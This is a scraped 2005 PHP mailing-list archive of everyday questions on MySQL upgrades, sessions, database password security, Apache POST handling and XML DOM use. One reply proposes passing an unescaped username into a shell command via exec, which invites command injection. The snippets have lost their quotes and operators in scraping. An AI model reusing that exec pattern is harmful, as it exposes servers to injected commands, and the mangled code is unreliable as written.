sorry, i googled again, read nearly every post wich containes mysql and upgrade but i can't find a useful answer in this list. perhaps its me... so my question is still the same, would i have to recompile php or not peter @NG what means need? nobody needs an internet,using mysql4 would just makes things easier (like using nested SELECTS) ... shure there is a lot of spam at the list, i did not asked for reasons for an upgrade because i already knew about that, so the next one who is googling for the problem, gets annoyed of the unuseful answer John Nichel schrieb: Peter wrote: Hi, i'm thinking of updating my mysql-server from 3.23 to 4.1.10, and i can't find any serious information if i would have to rebuild php too. anybody tryed this already?? system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52 thanks peter Please don't spam the list with multiple messages asking the same question. Before you 'upgrade', ask youself, Do I need to upgrade?. What features do you need in 4.1.x that are not present in 3.x? If the answer to that is 'none', you're probably better off leaving it alone. If you still fell you _have_ to upgrade, think about using the 4.0.x version instead of 4.1.x. If you 'upgrade' to MySQL 4.1.x, and don't go with PHP5, you really haven't done anything for your apps, as you won't be able to take advantage of some of the new features. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How can I secure database passwords used by PHP webpages
Rob Tanner wrote: We're a four year college. Some maintainers are faculty, some are staff and some are work-study (students) and centrally we have little say over who can and can't. You can put super crucial username/passwords into httpd.conf or root-readable files that get included into httpd.conf Other than that, the basic rule to remember is: If PHP can read the password, so can anybody with a login. If that's not acceptable for that password, you have very few options: Move it to httpd.conf Get rid of that user Maybe you need to re-structure your server and its access levels to reflect reality. You probably trust faculty/staff more than students in terms of intentional abuse. Though naivete and ignorance might go the other way 'round. :-) You *could* run two pools of Apache servers, with two different configs, and two different PHP users, and give different User/Group settings in the two different httpd.conf files to separate your faculty/staff from your students. Though it might be cheaper to just buy a stock Linux box and move all the students to that box -- where you simply accept the fact that students are going to mess it up more than the faculty/staff box. At any rate, the problem is simply not solvable by PHP, and, when you get right down to it, not even in the PHP realm. Whatever trust level you have or don't have, the database passwords being readable by untrusted users who have logins is lower on the problem stack than a zillion other nasty things they can do if they have a login and you don't trust them. Fixing the passwords may well have looked like the easiest one to tackle, but it's not that easy at all, and you won't improve your general security health level even if it *was* something easy to fix, as the perpetrators would simply turn aside from db access and do more... interesting... things with their logins. PS Finding a perpetrator and penalizing them harshly and publicly may wake up some students to the risks of what they are doing. Or not... Worth considering. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Authentication fails
On 3/2/2005 2:29 PM Richard Lynch wrote: I've got some more information and I hope someone can help me figure out the problem. I changed my original PHP program so that the form action script is a different script. In that file, I just do a var_dump on $_POST and $_SERVER. When I do that, it looks like all of the data comes through correctly. On the other hand, when the form action script is the *same* script that contains the form, when I do the same var_dumps, the data does *not* have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is GET, not POST in this instance. So it appears that my problem is that when I post to the same script I am running, things don't work. I still have no idea why this would be the case. Does anyone have any ideas? Whoops! You're *not* the mini_httpd guy, are you? Sorry, crossed my threads. No, I'm the Apache/2.0.52 (Fedora) Server at john.swartzentruber.us Port 80 guy. Start digging into httpd.conf and look real careful at any changes involving POST/GET and METHOD etc. 'diff' your httpd.conf with the one that ships out with the software. (See man diff) I've done this and don't see anything. I'm not positive I have the original httpd.conf file to compare against, but I have one saved in a backup directory that is named httpd.conf.rpmnew, so I think it is either original or from an RPM update. My differences are: 1. additional files in DirectoryIndex 2. HostnameLookups is On 3. the /server-status and /server-info sections are uncommented (but only accessible from my internal network) 4. Added virtual hosting stuff I looked at all instances of GET and POST, and only see a section that is commented out in both copies of httpd.conf. Here is my VirtualHost for the thing I am testing (I X'd out some stuff): VirtualHost 66.92..XX:80 10.X.0.3:80 ServerName john.swartzentruber.us ServerAdmin webmasXXXtzentruber.us DocumentRoot /var/www/vhosts/swartzentruber.us/john/html Directory /var/www/vhosts/swartzentruber.us/john/html AllowOverride AuthConfig Options Indexes Includes FollowSymLinks Order allow,deny Allow from all /Directory /VirtualHost Is there anything funny there that would cause a problem? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] update of mysql to 4.x
Peter wrote: sorry, i googled again, read nearly every post wich containes mysql and upgrade but i can't find a useful answer in this list. perhaps its me... so my question is still the same, would i have to recompile php or not No, you don't. However, mysql = 4.1 uses new authentication protocol, read http://dev.mysql.com/doc/mysql/en/old-client.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Document root, preferred way to find it???
Al mailto:[EMAIL PROTECTED] on Wednesday, March 02, 2005 11:22 AM said: I've been using in my scripts $_SERVER['DOCUMENT_ROOT'] to find the base path for includes, etc. We just moved the site to a new virtual host and it doesn't work. print_r() gives me: $_SERVER['document_root']= /usr/local/apache/htdocs $_SERVER['path_translated']= /home/user/public_html/ What do you guys use for you docroot? One option is to set your own: ?php $APP['document_root'] = '/wherever/you/want'; ? hth, Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Supporting Cancel
Dan Tappin wrote: To be honest the real answer will be unpopular but since the old system is unusable, not maintainable it should be replaced. I think if you estimated the time / cost to rebuild the system from scratch it would still be the better than trying to continue with this PITA system. Why don't you at least start on a new UI from this point and show the company the benefits and then work on replacing the old UI? I think holding on to the old way of doing things just because so much time was put into it is perhaps a short term solution. I agree with you 100% in principle. I failed to mention this, however: I now work for the Institute of Design a graduate school for product Design of the Illinois Institute of Technology The front-end of the site was Designed by a committee of faculty. The back-end was designed by my boss the IT/faculty guy, and by a first-year graduate student who means well, and is really nice and all that, but... I've only been here a couple months. They still believe the code-base of my predecessor is GREAT. Let's just say it would be work-political suicide to suggest starting over at this point. And I *do* need a job right now. On the plus side, minimalism is in now, so the front-end is actually not so bad, for the most part. And my boss is anti-JavaScript, anti-Flash, and even anti-Cookie (well, he's not, but he knows too many users are) so a lot of Good Things are involved here. Even the back end isn't *BAD* except for trying to make it too much like a desktop application, which didn't seem to bother my predecessor and his zillion temp tables. PS Y'all take this CEO thang way too seriously :-) It's a JOKE! -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: PHP5 DOM - DomDocumentFragments empty
Here is a modified version of the code that you posted that should
explain it.
?php
$xmlData = XMLDATA
?xml version=1.0 encoding=ISO-8859-1 ?
root
subElementcontent/subElement
/root
XMLDATA;
$dom = new DomDocument;
$dom-loadXML( $xmlData );
$dom2 = new DomDocument;
$fragment = $dom2-createDocumentFragment();
foreach( $dom-childNodes AS $node ) {
$newNode = $dom2-importNode( $node, true );
/** This is the (undocumented?) way to get the value of a text node */
var_dump($newNode-nodeValue);
$fragment-appendChild( $newNode );
/** Now we see what the value of the $fragment is */
var_dump($fragment);
}
$dom2-appendChild( $fragment );
/** Finally, we echo the XML of the new document */
echo $dom2-saveXML();
?
--
Teach a man to fish...
NEW? | http://www.catb.org/~esr/faqs/smart-questions.html
STFA | http://marc.theaimsgroup.com/?l=php-generalw=2
STFM | http://php.net/manual/en/index.php
STFW | http://www.google.com/search?q=php
LAZY |
http://mycroft.mozdev.org/download.html?name=PHPsubmitform=Find+search+plugins
signature.asc
Description: OpenPGP digital signature
[PHP] loggin into linux account
Hi, The scenario is, I made a login interface wherein i accept usernames and passwords from users and after comparing them to a database I log them in. The server runs Linux Fedora Core 2. Now I want to know whether there can be a scenario wherein I can make the logged in user have access to files of which he/she is the owner of or the file belongs to a group whose membership he/she has. Is this possible ? because as far as my knowledge goes, its only possible to give access to users to specific files if the user logs in to a particular shell. Please provide some help on this if you can. Thanks in advance ! Thanks Vaibhav -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] update of mysql to 4.x
Peter wrote: sorry, i googled again, read nearly every post wich containes mysql and upgrade but i can't find a useful answer in this list. perhaps its me... so my question is still the same, would i have to recompile php or not peter @NG what means need? nobody needs an internet,using mysql4 would just makes things easier (like using nested SELECTS) ... shure there is a lot of spam at the list, i did not asked for reasons for an upgrade because i already knew about that, so the next one who is googling for the problem, gets annoyed of the unuseful answer Well then far beit from me to try and help in a manner that is unacceptable to you. Maybe I should just go back to my standard answer... http://www.google.com/search?q=php+upgrade+mysql+4.1 -- John C. Nichel ÜberGeek KegWorks.com 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] PHP Sessions?
rory walsh mailto:[EMAIL PROTECTED]
on Wednesday, March 02, 2005 11:19 AM said:
?php
if($_POST[username]==rory){//if user logs in as rory start session
session_start();
header(Cache-control: private);
$_SESSION['loggedin'] = yes;
}
Put session_start(); at the *very* beginning of your script. See if that
helps.
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Catalog or cart
On Wed, 2005-03-02 at 02:45 -0800, Ryan A wrote: Hey all, I have a client who has a computer store, now he wants to put all his stuff in one site. He does not want to do any selling from his site, but just list all his items. After looking via google and the the usual script sites, agora cart looks pretty good and easy to maintain, other choices X-Cart,oscommerce,phpcatalog I dont really want to build this from scratch as I am sure a lot of very very good solutions are already out there and i would rather use the time instead to either tweak the software to his particular needs/requests request for example: he wants a few lines and a picture(optional) of his product (eg: a HP printer) and when clicked on it should pop up a window with that products details. /request or cleaning up his design, digital snaps etc I've never really worked on a site like this before so I would appreciate any recommendations you have towards a cart or catalog system thats has worked really well for you, or you heard is good or you helped develop etc I would like a cart/catalog that is open source (does not have to be free..but not expensive) so i can play with the code if need be. The reason i was leaning towards a cart is, if he ever decides to sell online, i dont want to build a whole extra piece of software to go with the catalog. Thanks in advance, Ryan Very flexible and runs on PostgreSQL. http://www.pgcart.com/ -Robby -- /*** * Robby Russell | Owner.Developer.Geek * PLANET ARGON | www.planetargon.com * Portland, OR | [EMAIL PROTECTED] * 503.351.4730 | blog.planetargon.com * PHP/PostgreSQL Hosting Development * --- Now hosting Ruby on Rails Apps --- / -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] FREETYPE and GD
BEAUTIFUL Thats exactly what I was looking for. I'm not doing anything with MySQL so I am going to leave Magic Quotes on and just use stripslashes() Thanks a bunch. Richard Lynch [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] Aaron Todd wrote: I've created a simple script that takes in image and draws some lines and some text on top of it. I am having a problem with the text part of this. When the string that I am drawing on the image contains and apostrophe ( ' ) there is always a backslash ( \ ) before it. It make sense that it is the escape character, but I need to be able to show the apostrophe. Anyone have any ideas about this? ?php $backdir = /var/www/html/backgrounds/; $im = ImageCreatefromJPEG($backdir.$_GET['background']); Because you have Magic Quotes GPC on, all GET/POST/COOKIE data automatically has addslashes called on it, before you see it. That's good because you are probably usually putting your data into a MySQL database that needs that. In this case, though, you want to use http://php.net/stripslashes to undo the automated addslashes of Magic Quotes. Or, if your site mostly/only takes GET data and puts it on images, and rarely puts it into the database, go ahead and turn Magic Quotes GPC off in php.ini (or in your .htaccess) Note that you can't turn it off in your script with ini_set since the GPC data is already altered by the time your script starts. GD is not really directly involved, per se, in this issue. You'd have the same problem if you were putting your GET data into a file, or displaying it directly to the user, or pretty much doing anything at all with it *except* for stuffing it into MySQL. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Sessions?
The problem there is that I have to test if the user has logged on so I
need to include the if statement? Can the session_start not be called
from within an if statement? Does it really have to be the very first
thing in the script, if so I imagine that this means a single script
cannot be used to manage a complete website?
Chris W. Parker wrote:
rory walsh mailto:[EMAIL PROTECTED]
on Wednesday, March 02, 2005 11:19 AM said:
?php
if($_POST[username]==rory){//if user logs in as rory start session
session_start();
header(Cache-control: private);
$_SESSION['loggedin'] = yes;
}
Put session_start(); at the *very* beginning of your script. See if that
helps.
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Catalog or cart
Robby Russell mailto:[EMAIL PROTECTED] on Wednesday, March 02, 2005 1:15 PM said: Very flexible and runs on PostgreSQL. http://www.pgcart.com/ And yadda yadda yadda, I'm tired today, said the elephant. Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] PHP Sessions?
rory walsh mailto:[EMAIL PROTECTED] on Wednesday, March 02, 2005 1:26 PM said: The problem there is that I have to test if the user has logged on so I need to include the if statement? Can the session_start not be called from within an if statement? Does it really have to be the very first thing in the script, if so I imagine that this means a single script cannot be used to manage a complete website? No session_start(); can go anywhere. It's just that it appears that your logic is setup in such a way that session_start(); is not being called when you need it be. By putting it before everything else you can avoid this. And as well, is there a reason you wouldn't want to just start the session at the beginning of the page? I mean, why wait till the user has submitted the form to start the session? Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Sessions?
Yes I see what you mean. I only wanted to start a session IF the user logged in, but I see your point, the session can be started as soon as anyone opens the main page. I'll give it a go and see if that helps, cheers, Rory. Chris W. Parker wrote: rory walsh mailto:[EMAIL PROTECTED] on Wednesday, March 02, 2005 1:26 PM said: The problem there is that I have to test if the user has logged on so I need to include the if statement? Can the session_start not be called from within an if statement? Does it really have to be the very first thing in the script, if so I imagine that this means a single script cannot be used to manage a complete website? No session_start(); can go anywhere. It's just that it appears that your logic is setup in such a way that session_start(); is not being called when you need it be. By putting it before everything else you can avoid this. And as well, is there a reason you wouldn't want to just start the session at the beginning of the page? I mean, why wait till the user has submitted the form to start the session? Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Catalog or cart
On Wed, 2005-03-02 at 13:15 -0800, Robby Russell wrote: On Wed, 2005-03-02 at 02:45 -0800, Ryan A wrote: Very flexible and runs on PostgreSQL. http://www.pgcart.com/ Oops, forgot to provide link for an example of it in production: - http://www.johnbenzart.com/ -Robby -- /*** * Robby Russell | Owner.Developer.Geek * PLANET ARGON | www.planetargon.com * Portland, OR | [EMAIL PROTECTED] * 503.351.4730 | blog.planetargon.com * PHP/PostgreSQL Hosting Development * --- Now hosting Ruby on Rails Apps --- / -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Sessions?
rory walsh wrote:
The problem there is that I have to test if the user has logged on so I
need to include the if statement?
there are 2 tests to do:
1. check to see whether the user is logged on already
2. check to see whether the user is trying to log on
Can the session_start not be called
from within an if statement?
not really, well you can but I can't think
of any reason that you would want to conditionally start the
session.
Does it really have to be the very first
thing in the script,
you have to call it before you use the session
(i.e. data stored in it).
if so I imagine that this means a single script
cannot be used to manage a complete website?
it can. maybe if I rewrite you code a little
it will help you understand:
?php
session_start(); // always start the session.
// you want something more secure as a login procedure!
if($_POST[username]==rory) {
// if user logs in as rory
// then mark the user as logged in
// in the session
$_SESSION['loggedin'] = yes;
}
if ($_SESSION['loggedin'] == yes) {
header(Cache-control: private);
}
Chris W. Parker wrote:
rory walsh mailto:[EMAIL PROTECTED]
on Wednesday, March 02, 2005 11:19 AM said:
?php
if($_POST[username]==rory){//if user logs in as rory start session
session_start();
header(Cache-control: private);
$_SESSION['loggedin'] = yes;
}
Put session_start(); at the *very* beginning of your script. See if that
helps.
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Setting cookie on first visit
Why not use sessions instead?
us2.php.net/session
On Wed, 2 Mar 2005 11:42:02 -0800 (PST), Richard Lynch [EMAIL PROTECTED]
wrote:
Tom Whitbread wrote:
I am using a cookie to detect what skin a user wants to display. The
problem is if a user visits the site for the first time the cookie is
not being set. I am detecting if its being set or not with
if(!isset($_COOKIE['skin'])){ ... }
It's not setting the cookie untill a user refreshes the page once. How
can I ensure it's set when it hasnt been set before?
Sure it's being set.
That's how you see it when they refresh the page.
$_COOKIE tells you want Cookies the browser *sent* with the request for
the URL.
It's up to you to track within that script what Cookies you are sending
*back* with the answer.
That sounds kinda harsh, and I can see why you'd want it to work the other
way -- as I first did.
But you *need* COOKIES to be what the browser sent initially.
I guess you *could* start doing things like:
?php
setcookie('var', $value);
$_COOKIES['var'] = $value;
?
and then it would do what you want...
But you could quickly confuse yourself about what came *in* from the
browser and what you are sending *out* to the browser.
Probably better for you to take a step back and think about how cookies
work, and who sends what where.
--
Like Music?
http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
The Disguised Jedi
[EMAIL PROTECTED]
Now you have my $0.02. Or .01 Pounds, .014 Euros, or $0.025 CAN. I'm
world-wide BABY!
PHP rocks!
Knowledge is Power. Power Corrupts. Go to school, become evil
Disclaimer: Any disclaimer attached to this message may be ignored.
However, I must say that the ENTIRE contents of this message are
subject to other's criticism, corrections, and speculations.
This message is Certified Virus Free
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Sessions?
Thanks everyone, I'm getting closer. The only problem I have not is that
I keep entering that test, I modified it to change the session variable
once we enter the test but it somehow does not seem to change it? This
is the code,
if(strlen($_SESSION['loggedin']==yes)){
$_SESSION['loggedin']=no;
$CONTENT = You are currently logged in as .$_POST[username].
form action=\index.php\ method=\POST\
input type=\submit\ value=\Log out\ /
input type=\hidden\ name=\logout\ value=\yes\//form
hrIf you would like to change the text on the main page please click
here a href=\index.php?action=edit\font color=\blue\Edit intro
page/afont color =\#136863\hrh3File Upload./h1hr Any files
will appear in the 'students' page of the website. Files that uploaded
here are not availablre to the public and can only be acccessed by
students who have logged in. Because of security issues only well know
file types such as word, acrobat and text files are legible for upload.
form enctype=\multipart/form-data\ action=\index.php\ method=\POST\
!-- MAX_FILE_SIZE must precede the file input field --
input type=\hidden\ name=\MAX_FILE_SIZE\ value=\3\ /
!-- Name of input element determines name in $_FILES array --
Send this file: input name=\userfile\ type=\file\ /
input type=\submit\ value=\Upload\ /
input type=\hidden\ name=\arg1\ value=\yes\
/form;
}
When I click the logout button it works fine, but when I click on the
link inside the page it simply reloads the same page as if the session
variable has not changed at all? If I link to a page like this does it
call the script again, or does this need to be done with a form submit?
I must apologise for my lack of knowledge here! I program in other
languages and as a result I have that I can get really deep in code I
don't understand very fast!
Rory Walsh wrote:
Yes I see what you mean. I only wanted to start a session IF the user
logged in, but I see your point, the session can be started as soon as
anyone opens the main page. I'll give it a go and see if that helps,
cheers,
Rory.
Chris W. Parker wrote:
rory walsh mailto:[EMAIL PROTECTED]
on Wednesday, March 02, 2005 1:26 PM said:
The problem there is that I have to test if the user has logged on so
I need to include the if statement? Can the session_start not be
called from within an if statement? Does it really have to be the
very first thing in the script, if so I imagine that this means a
single script cannot be used to manage a complete website?
No session_start(); can go anywhere. It's just that it appears that your
logic is setup in such a way that session_start(); is not being called
when you need it be. By putting it before everything else you can avoid
this.
And as well, is there a reason you wouldn't want to just start the
session at the beginning of the page? I mean, why wait till the user has
submitted the form to start the session?
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] loggin into linux account
Vaibhav Sibal wrote: The scenario is, I made a login interface wherein i accept usernames and passwords from users and after comparing them to a database I log them in. The server runs Linux Fedora Core 2. Now I want to know whether there can be a scenario wherein I can make the logged in user have access to files of which he/she is the owner of or the file belongs to a group whose membership he/she has. Is this possible ? because as far as my knowledge goes, its only possible to give access to users to specific files if the user logs in to a particular shell. Please provide some help on this if you can. Thanks in advance ! You could compare their username that you are using to the username in /etc/passwd and compare that to http://php.net/fileowner If you control both /etc/passwd and the database, and have the usernames synchronized, you could write your PHP script so that people can only see or read the files owned by them. With a bit more effort, you could also compare groups and group permissions with http://php.net/filegroup You would probably need http://php.net/exec and do something like: $command = groups $username; to find out what groups the user is a member of, and then go through /etc/passwd to find out the group IDs and compare those to the output of 'filegroup' So it *could* be done, but it will be a bit of work. You may want to Google for PHP fileowner filegroup or similar and see if there's an existing script out there for it. http://phpclasses.org should be searched in particular. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Authentication fails
John Swartzentruber wrote: VirtualHost 66.92..XX:80 10.X.0.3:80 ServerName john.swartzentruber.us ServerAdmin webmasXXXtzentruber.us DocumentRoot /var/www/vhosts/swartzentruber.us/john/html Directory /var/www/vhosts/swartzentruber.us/john/html AllowOverride AuthConfig Options Indexes Includes FollowSymLinks Order allow,deny Allow from all /Directory /VirtualHost Nothing I can see... I guess the next thing I would advise would be: 1. Write/steal a Perl CGI script that does a simple POST processing, and see if *IT* can work. Either your webserver is messing up POST, or PHP is. If Perl can't work POST, it's your webserver. If Perl *can* do POST, it's probably PHP. 2. File a bug report (after searching for them) in the PHP or Apache bugs systems. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] PHP Sessions?
rory walsh mailto:[EMAIL PROTECTED]
on Wednesday, March 02, 2005 2:08 PM said:
Thanks everyone, I'm getting closer. The only problem I have not is
that I keep entering that test, I modified it to change the session
variable once we enter the test but it somehow does not seem to
change it? This is the code,
Immediately I see:
if(strlen($_SESSION['loggedin']==yes)){
That doesn't make sense. Do you mean?:
if($_SESSION['loggedin'] == yes) {
And the next line:
$_SESSION['loggedin']=no;
Why are you reversing the value of 'loggedin'? Once the person is logged
in shouldn't they stay that way until session timeout or they log out?
When I click the logout button it works fine, but when I click on the
link inside the page it simply reloads the same page as if the session
variable has not changed at all? If I link to a page like this does it
call the script again, or does this need to be done with a form
submit? I must apologise for my lack of knowledge here! I program in
other languages and as a result I have that I can get really deep in
code I don't understand very fast!
Maybe you've already stated this in a previous email and I just don't
remember, what exactly is it that you're trying to accomplish?
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] php DBMS
Chris W. Parker wrote: Gerben mailto:[EMAIL PROTECTED] on Wednesday, March 02, 2005 10:22 AM said: Thanks for all your responses, but I think I wasn't clear enough of my intentions. Actually, that what I'm looking for; A database engine written in PHP. Even if something like this did exist why would you want it over MySQL? They have licensing issues with MySQL, I guess. I'd go with http://postgresql.org in that case, rather than roll my own, but that's just me :-) -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] How to sort a Multidimensional array?
Hi,
i have a multidimensional array that look like this:
$arr=array($key=array('item0key'='item0', 'item1key'='item1',
'item2key'='item2', 'item3key'='item3', 'item4key'='item4'));
Lineview:
0item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
1item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
2item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
4item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
How can I sort such an array, depending on the Userentry by the Item values?
Thank you very much
Mirco Blitz
__
Verschicken Sie romantische, coole und witzige Bilder per SMS!
Jetzt bei WEB.DE FreeMail: http://f.web.de/?mc=021193
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Sessions?
Sorry bout that little mistake. You right I mean to check to see if
$_SESSION['loggedin'] == yes; That doesn't make a difference as it
turns out. The reason that I immediately change this is that I want the
content of the page to change, and in order to do that I want to stop it
from going into this code? Actually I am not going to do this, I will
use another variable, but by setting $_SESSION['loggedin'] to 'no' it
should not go into this test, but it somehow does? Is it to do with the
link:
a href=\index.php?action=edit\
does this call the script again, just as an action=script.php in a
form would? Cheers for the help on this.
Chris W. Parker wrote:
rory walsh mailto:[EMAIL PROTECTED]
on Wednesday, March 02, 2005 2:08 PM said:
Thanks everyone, I'm getting closer. The only problem I have not is
that I keep entering that test, I modified it to change the session
variable once we enter the test but it somehow does not seem to
change it? This is the code,
Immediately I see:
if(strlen($_SESSION['loggedin']==yes)){
That doesn't make sense. Do you mean?:
if($_SESSION['loggedin'] == yes) {
And the next line:
$_SESSION['loggedin']=no;
Why are you reversing the value of 'loggedin'? Once the person is logged
in shouldn't they stay that way until session timeout or they log out?
When I click the logout button it works fine, but when I click on the
link inside the page it simply reloads the same page as if the session
variable has not changed at all? If I link to a page like this does it
call the script again, or does this need to be done with a form
submit? I must apologise for my lack of knowledge here! I program in
other languages and as a result I have that I can get really deep in
code I don't understand very fast!
Maybe you've already stated this in a previous email and I just don't
remember, what exactly is it that you're trying to accomplish?
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Catalog or cart
Hey all, Thanks guys, I'm checking the ones you recommended and taking most of your advise ;-) Feel free to write in if you missed anything in your old reply or have new recommendations. Cheers, Ryan Hey all, I have a client who has a computer store, now he wants to put all his stuff in one site. He does not want to do any selling from his site, but just list all his items. After looking via google and the the usual script sites, agora cart looks pretty good and easy to maintain, other choices X-Cart,oscommerce,phpcatalog I dont really want to build this from scratch as I am sure a lot of very very good solutions are already out there and i would rather use the time instead to either tweak the software to his particular needs/requests request for example: he wants a few lines and a picture(optional) of his product (eg: a HP printer) and when clicked on it should pop up a window with that products details. /request or cleaning up his design, digital snaps etc I've never really worked on a site like this before so I would appreciate any recommendations you have towards a cart or catalog system thats has worked really well for you, or you heard is good or you helped develop etc I would like a cart/catalog that is open source (does not have to be free..but not expensive) so i can play with the code if need be. The reason i was leaning towards a cart is, if he ever decides to sell online, i dont want to build a whole extra piece of software to go with the catalog. Thanks in advance, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.308 / Virus Database: 266.5.7 - Release Date: 3/1/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] How to sort a Multidimensional array?
Hi,
i have a multidimensional array that look like this:
$arr=array($key=array('item0key'='item0', 'item1key'='item1',
'item2key'='item2', 'item3key'='item3', 'item4key'='item4'));
Lineview:
0item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
1item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
2item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
4item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
How can I sort such an array, depending on the Userentry by the Item values?
Thank you very much
Mirco Blitz
[PHP] How to sort a Multidimensional array?
Hi,
i have a multidimensional array that look like this:
$arr=array($key=array('item0key'='item0', 'item1key'='item1',
'item2key'='item2', 'item3key'='item3', 'item4key'='item4'));
Lineview:
0item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
1item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
2item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
4item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
How can I sort such an array, depending on the Userentry by the Item values?
Thank you very much
Mirco Blitz
[PHP] How to sort a Multidimensional array?
Hi,
i have a multidimensional array that look like this:
$arr=array($key=array('item0key'='item0', 'item1key'='item1',
'item2key'='item2', 'item3key'='item3', 'item4key'='item4'));
Lineview:
0item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
1item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
2item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
4item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
How can I sort such an array, depending on the Userentry by the Item values?
Thank you very much
Mirco Blitz
AW: [PHP] How to sort a Multidimensional array?
Sorry for multipost. My ISP delayed sends for about an houre. I didn't
recognize it.
-Ursprüngliche Nachricht-
Von: Popbox [mailto:[EMAIL PROTECTED]
Gesendet: Mittwoch, 2. März 2005 23:14
An: php-general@lists.php.net
Betreff: [PHP] How to sort a Multidimensional array?
Hi,
i have a multidimensional array that look like this:
$arr=array($key=array('item0key'='item0', 'item1key'='item1',
'item2key'='item2', 'item3key'='item3', 'item4key'='item4'));
Lineview:
0item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
1item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
2item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
4item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
How can I sort such an array, depending on the Userentry by the Item values?
Thank you very much
Mirco Blitz
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How to sort a Multidimensional array?
Hello!
This must be one of the most frequently asked questions ever. Anyway,
take a look at the PHP manual. Look for a function called 'foreach'. To
put it simple, with 'foreach' you are able to go through the array
step-by-step, value by value.
For example:
?php
$arr = array('value1', 'value2', 'value3);
foreach ($arr as $key = $value) {
echo Key: $key; Value: $valuebr /\n; // in stead of just
echoing the values and keys, you can e.g. assign the values to another
array and sort them when done
}
?
regards,
frank
2005-03-02 kl. 23.27 skrev Mirco Blitz:
Hi,
i have a multidimensional array that look like this:
$arr=array($key=array('item0key'='item0', 'item1key'='item1',
'item2key'='item2', 'item3key'='item3', 'item4key'='item4'));
Lineview:
0item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
1item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
2item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
4item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
How can I sort such an array, depending on the Userentry by the Item
values?
Thank you very much
